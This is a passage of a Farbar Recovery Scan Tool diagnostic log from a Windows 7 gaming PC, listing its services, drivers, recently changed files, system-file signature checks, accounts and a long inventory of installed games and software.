R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [5544568 2015-08-26] (NVIDIA Corporation)
S4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [1931632 2015-04-22] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2015-01-11] ()
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AWOPFilterDriver; C:\Windows\system32\drivers\AWOPFilterDriver.sys [20560 2015-01-29] ()
R3 CorsairVBusDriver; C:\Windows\System32\DRIVERS\CorsairVBusDriver.sys [47840 2015-05-18] (Corsair)
R3 CorsairVHidDriver; C:\Windows\System32\DRIVERS\CorsairVHidDriver.sys [21728 2015-05-18] (Corsair)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation)
R3 mio; C:\Windows\System32\DRIVERS\mio.sys [7680 2011-05-04] (Dell/Alienware)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19576 2015-08-26] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [50472 2015-08-10] (NVIDIA Corporation)
R3 Phosgene; C:\Windows\System32\DRIVERS\Phosgene.sys [31656 2015-06-08] ()
S3 TRIDCap; C:\Windows\System32\DRIVERS\AVerTM62_x64.sys [1074048 2012-11-22] (AVerMedia TECHNOLOGIES, Inc. ) [File not signed]
S3 XSplit_Dummy; C:\Windows\System32\drivers\xspltspk.sys [26200 2014-07-02] (SplitmediaLabs Limited)
S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 X6va012; \??\C:\Windows\SysWOW64\Drivers\X6va012 [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-10-10 19:35 - 2015-10-10 19:35 - 00018069 _____ C:\Users\Rainsford\Desktop\FRST.txt
2015-10-10 19:34 - 2015-10-10 19:35 - 00000000 ____D C:\FRST
2015-10-10 19:34 - 2015-10-10 19:34 - 02195456 _____ (Farbar) C:\Users\Rainsford\Desktop\FRST64.exe
2015-10-10 19:30 - 2015-10-10 19:30 - 00000168 _____ C:\Windows\setupact.log
2015-10-10 19:30 - 2015-10-10 19:30 - 00000000 _____ C:\Windows\setuperr.log
2015-10-09 21:48 - 2015-10-09 21:49 - 00000000 ____D C:\Users\Rainsford\Desktop\Notes
2015-10-09 20:29 - 2015-10-09 20:35 - 00009466 _____ C:\Users\Rainsford\Desktop\hijackthis.log
2015-10-09 20:27 - 2015-10-09 20:27 - 00388608 _____ (Trend Micro Inc.) C:\Users\Rainsford\Desktop\HijackThis.exe
2015-10-07 13:29 - 2015-10-08 13:56 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\PixelPiracy
2015-10-01 15:22 - 2015-10-01 15:22 - 00000000 ____D C:\Steam
2015-09-30 22:02 - 2015-09-30 22:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-09-24 15:50 - 2015-09-24 15:50 - 00000000 ____D C:\Users\Rainsford\AppData\LocalLow\Tensun
2015-09-24 15:49 - 2015-09-24 15:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2015-09-24 15:49 - 2015-09-24 15:49 - 00000000 ____D C:\Program Files\7-Zip
2015-09-23 13:06 - 2015-09-23 13:06 - 00000000 ____D C:\ArcheAge
2015-09-23 10:41 - 2015-10-09 19:59 - 00000000 ____D C:\Program Files (x86)\Glyph
2015-09-23 10:41 - 2015-09-23 10:41 - 00000997 _____ C:\Users\Rainsford\Desktop\Glyph.lnk
2015-09-23 10:41 - 2015-09-23 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glyph
2015-09-17 21:32 - 2015-09-17 21:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Corsair Utility Engine
2015-09-17 21:32 - 2015-09-17 21:32 - 00000000 ____D C:\Program Files (x86)\Corsair

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-10-10 19:34 - 2014-11-10 23:55 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-10-10 19:33 - 2015-03-30 09:22 - 01986947 _____ C:\Windows\WindowsUpdate.log
2015-10-10 19:32 - 2014-06-14 21:40 - 00000924 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000UA.job
2015-10-10 19:31 - 2013-07-09 21:54 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\Skype
2015-10-10 19:30 - 2015-09-01 16:11 - 00000000 ____D C:\ProgramData\NVIDIA
2015-10-10 19:30 - 2014-11-10 23:55 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-10-10 19:30 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-10-09 22:32 - 2014-06-14 21:40 - 00000872 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000Core.job
2015-10-09 22:01 - 2015-09-07 01:12 - 00000000 ____D C:\New folder
2015-10-09 21:57 - 2015-09-07 16:54 - 00000080 _____ C:\Users\Rainsford\AppData\Local剜捯獫慴⁲慇敭屳呇⁁屖湥楴汴浥湥⹴湩潦
2015-10-09 21:37 - 2015-07-01 01:04 - 00000000 ____D C:\Program Files (x86)\CABAL2 (US)
2015-10-09 21:19 - 2013-11-10 13:09 - 00000000 ____D C:\Windows\pss
2015-10-09 21:18 - 2013-09-14 21:31 - 00000000 ____D C:\Users\Rainsford\AppData\Local\CrashDumps
2015-10-09 21:04 - 2009-07-13 23:45 - 00021280 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-10-09 21:04 - 2009-07-13 23:45 - 00021280 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-10-09 20:51 - 2015-08-26 18:51 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-10-09 20:28 - 2014-05-20 20:40 - 00000000 ____D C:\Users\Rainsford\AppData\Local\Glyph
2015-10-09 20:21 - 2014-09-12 12:12 - 00000000 ____D C:\Users\Rainsford\Documents\ArcheAge
2015-10-09 02:16 - 2015-01-15 02:54 - 00000000 ____D C:\Fraps Movies
2015-10-02 21:54 - 2015-06-15 23:38 - 00780488 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-10-02 21:54 - 2015-06-15 23:38 - 00142536 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-10-02 21:53 - 2014-09-01 23:01 - 00000000 ____D C:\Users\Rainsford\AppData\Local\Adobe
2015-10-01 17:33 - 2014-11-26 14:14 - 00000000 ____D C:\Users\Rainsford\AppData\Local\Frontier_Developments
2015-10-01 15:30 - 2014-11-26 14:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Frontier
2015-10-01 15:27 - 2014-09-11 19:50 - 00000000 ____D C:\Games
2015-10-01 09:38 - 2013-07-09 21:45 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-09-30 17:04 - 2013-07-10 13:12 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\LolClient
2015-09-29 15:25 - 2014-04-04 20:32 - 00000000 ____D C:\ProgramData\TEMP
2015-09-29 08:30 - 2013-10-23 09:18 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\vlc
2015-09-29 08:25 - 2013-07-22 11:27 - 00000000 ___HD C:\Steamed
2015-09-23 12:40 - 2015-06-29 21:47 - 00000000 ____D C:\Users\Rainsford\AppData\Local\Akamai
2015-09-23 10:41 - 2014-05-20 20:40 - 00000000 ____D C:\ProgramData\Glyph
2015-09-20 21:42 - 2013-07-12 20:14 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\BitTorrent
2015-09-19 09:51 - 2013-07-10 00:23 - 00000000 ____D C:\Users\Rainsford\AppData\Local\Warframe
2015-09-18 23:44 - 2015-08-20 20:01 - 00000000 ____D C:\School
2015-09-16 23:07 - 2015-09-07 17:10 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\NVIDIA
2015-09-16 09:46 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF
2015-09-16 02:29 - 2014-11-10 23:55 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-09-16 02:29 - 2014-11-10 23:55 - 00003642 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-09-15 22:27 - 2014-06-14 21:40 - 00003906 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000UA
2015-09-15 22:27 - 2014-06-14 21:40 - 00003510 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000Core
2015-09-15 14:59 - 2013-08-29 17:28 - 00000056 _____ C:\Windows\kgt2k.INI
2015-09-15 14:18 - 2014-12-29 22:38 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\MMFApplications

==================== Files in the root of some directories =======

2014-08-03 12:34 - 2014-09-11 17:08 - 0007602 _____ () C:\Users\Rainsford\AppData\Local\Resmon.ResmonCfg

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-10-01 12:27

==================== End of FRST.txt ============================

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:10-10-2015
Ran by Rainsford (2015-10-10 19:36:05)
Running from C:\Users\Rainsford\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2013-07-10 02:16:28)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-671774419-928818983-1318283798-500 - Administrator - Disabled)
Guest (S-1-5-21-671774419-928818983-1318283798-501 - Limited - Disabled)
Rainsford (S-1-5-21-671774419-928818983-1318283798-1000 - Administrator - Enabled) => C:\Users\Rainsford

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 15.07 beta (x64) (HKLM\...\7-Zip) (Version: 15.07 - Igor Pavlov)
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.2.202.235 - Adobe Systems Incorporated)
Adobe Flash Player 19 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 19.0.0.185 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Akamai) (Version:  - Akamai Technologies, Inc)
Alienware Command Center (HKLM-x32\...\InstallShield_{ACBE8264-9018-49B8-9041-3A74E2596BF3}) (Version: 2.8.9.0 - Alienware Corp.)
Alienware Command Center (Version: 2.8.9.0 - Alienware Corp.) Hidden
Archeage (HKLM-x32\...\Glyph Archeage) (Version:  - Trion Worlds, Inc.)
BitTorrent (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\BitTorrent) (Version: 7.9.4.40912 - BitTorrent Inc.)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
CABAL2 (US) (HKLM-x32\...\CABAL2US) (Version:  - ESTsoft Corp.)
CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.03 - Piriform)
Corsair Utility Engine (HKLM-x32\...\{791216E9-E76E-4C76-9C6E-C968A8C253D9}) (Version: 1.10.67 - Corsair)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited)
Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.41 - Creative Technology Limited)
Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.03 - Creative Technology Limited)
Creeper World 3: Arc Eternal (HKLM-x32\...\Steam App 280220) (Version:  - Knuckle Cracker)
Dark Souls: Prepare to Die Edition (HKLM-x32\...\Steam App 211420) (Version:  - FromSoftware)
Dolby Digital Live Pack (HKLM-x32\...\Dolby Digital Live Pack) (Version: 3.00 - Creative Technology Limited)
DTS Connect Pack (HKLM-x32\...\DTS Connect Pack) (Version: 1.00 - Creative Technology Limited)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version:  - Frontier Developments)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
FaceRig (HKLM-x32\...\Steam App 274920) (Version:  - Holotech Studios)
FaceRig Virtual Video driver version 1.0 (HKLM-x32\...\{7D6A1A0F-F57E-4C6B-9331-86CBC7D5C787}_is1) (Version: 1.0 - Adoriasoft LLC)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version:  - Obsidian Entertainment)
FINAL FANTASY XIV - A Realm Reborn (HKLM-x32\...\{2B41E132-07DF-4925-A3D3-F2D1765CCDFE}) (Version: 1.0.0000 - SQUARE ENIX CO., LTD.)
Folk Tale (HKLM-x32\...\Steam App 224440) (Version:  - Games Foundry)
Fractured Space (HKLM-x32\...\Steam App 310380) (Version:  - Edge Case Games Ltd.)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Glyph (HKLM-x32\...\Glyph) (Version:  - Trion Worlds, Inc.)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version:  - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.101 - Google Inc.)
Google Talk Plugin (HKLM-x32\...\{CA3DD97D-1FD7-37A7-BD5C-FC4430C8B8E6}) (Version: 5.41.2.0 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Grand Theft Auto V (HKLM-x32\...\Steam App 271590) (Version:  - Rockstar North)
Hardland (HKLM-x32\...\Steam App 321980) (Version:  - Mountain Sheep)
HOARD (HKLM-x32\...\Steam App 63000) (Version:  - Big Sandwich Games)
HP Deskjet 3050 J610 series Basic Device Software (HKLM\...\{7D220A57-969F-4D09-9297-D48195A8ABDD}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Deskjet 3050 J610 series Help (HKLM-x32\...\{F7632A9B-661E-4FD9-B1A4-3B86BC99847F}) (Version: 140.0.63.63 - Hewlett Packard)
Java 8 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418045F0}) (Version: 8.0.450 - Oracle Corporation)
Java SE Development Kit 7 Update 25 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0170250}) (Version: 1.7.0.250 - Oracle)
Java SE Development Kit 7 Update 40 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0170400}) (Version: 1.7.0.400 - Oracle)
League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
Left 4 Dead (HKLM-x32\...\Steam App 500) (Version:  - Valve)
LEGO Lord of the Rings (HKLM-x32\...\Steam App 214510) (Version:  - Traveller's Tales)
Lego Star Wars Saga (HKLM-x32\...\Steam App 32440) (Version:  - Traveller's Tales )
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)
LOLReplay (HKLM-x32\...\LOLReplay) (Version: 0.8.9.22 - www.leaguereplays.com)
LOOT (HKLM-x32\...\LOOT) (Version: 0.6.0 - LOOT Development Team)
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Media Plugin (HKLM-x32\...\InstallShield_{9A81C9E3-EE6E-435C-9A9A-3749D02D8C4A}) (Version: 1.0.0.16 - Alienware)
Media Plugin (x32 Version: 1.0.0.16 - Alienware) Hidden
METAL GEAR SOLID V: GROUND ZEROES (HKLM-x32\...\Steam App 311340) (Version:  - Kojima Productions)
METAL GEAR SOLID V: THE PHANTOM PAIN (HKLM-x32\...\Steam App 287700) (Version:  - Konami Digital Entertainment)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft AppLocale (HKLM-x32\...\{394BE3D9-7F57-4638-A8D1-1D88671913B7}) (Version: 1.0.0 - MS)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{887868A2-D6DE-3255-AA92-AA0B5A59B874}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version:  - )
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 41.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 41.0.1 (x86 en-US)) (Version: 41.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.1.5750 - Mozilla)
My.com Game Center (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\MyComGames) (Version: 3.140 - My.com B.V.)
Nightly 36.0a1 (x64 en-US) (HKLM\...\Nightly 36.0a1 (x64 en-US)) (Version: 36.0a1 - Mozilla)
NVIDIA 3D Vision Controller Driver 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 355.82 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.5.14.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.14.5 - NVIDIA Corporation)
NVIDIA Graphics Driver 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 355.82 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.0.0 (HKLM-x32\...\{55E61709-D7D4-43C0-B45D-BFAF5C09A02D}) (Version: 4.00.9702 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PAC-MAN Championship Edition DX+ (HKLM-x32\...\Steam App 236450) (Version:  - Mine Loader Software Co., Ltd.)
Path of Exile (HKLM-x32\...\Steam App 238960) (Version:  - Grinding Gear Games)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
Pixel Piracy (HKLM-x32\...\Steam App 264140) (Version:  - Vitali Kirpu)
PVZ Garden Warfare (HKLM-x32\...\{A5AC7D7B-C1D5-4AF9-8829-993DA335BE1B}) (Version: 1.0.3.0 - Electronic Arts)
Resident Evil 4 / Biohazard 4 (HKLM-x32\...\Steam App 254700) (Version:  - Capcom)
Resident Evil 5 (HKLM-x32\...\Steam App 21690) (Version:  - Capcom)
Robocraft (HKLM-x32\...\Steam App 301520) (Version:  - Freejam)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.6.5 - Rockstar Games)
Rogue Legacy (HKLM-x32\...\Steam App 241600) (Version:  - Cellar Door Games)
RPG Maker VX RTP (HKLM-x32\...\RPG Maker VX RTP_is1) (Version: 1.02 - Enterbrain)
SHIELD Streaming (Version: 4.1.3000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.5.14.5 - NVIDIA Corporation) Hidden
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
skyforge_mycom (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\skyforge_mycom) (Version: 1.35 - My.com B.V.)
Skype™ 7.7 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.7.103 - Skype Technologies S.A.)
Starpoint Gemini 2 (HKLM-x32\...\Steam App 236150) (Version:  - Little Green Men Games)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.15.1 - TeamSpeak Systems GmbH)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version:  - Bethesda Game Studios)
The Legend of Heroes: Trails in the Sky (HKLM-x32\...\Steam App 251150) (Version:  - Nihon Falcom)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.0.8.3 - GOG.com)
The Witcher 3: Wild Hunt - Alternative Look for Ciri (HKLM-x32\...\Alternative Look for Ciri_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Alternative Look for Triss (HKLM-x32\...\Alternative Look for Triss_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Alternative Look for Yennefer (HKLM-x32\...\Alternative Look for Yennefer_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Ballad Heroes - Neutral Gwent Card Set (HKLM-x32\...\Ballad Heroes - Neutral Gwent Card Set_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Beard and Hairstyle Set (HKLM-x32\...\Beard and Hairstyle Set_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Elite Crossbow Set (HKLM-x32\...\Elite Crossbow Set_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Finisher Animations (HKLM-x32\...\New Finisher Animations_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - NEW GAME + (HKLM-x32\...\NEW GAME +_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Quest - Contract - Skellige's Most Wanted (HKLM-x32\...\New Quest - Contract: Skellige's Most Wanted_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Quest - Contract Missing Miners (HKLM-x32\...\New Quest - Contract Missing Miners_is1) (Version: 1.0.0.0 - GOG.com)
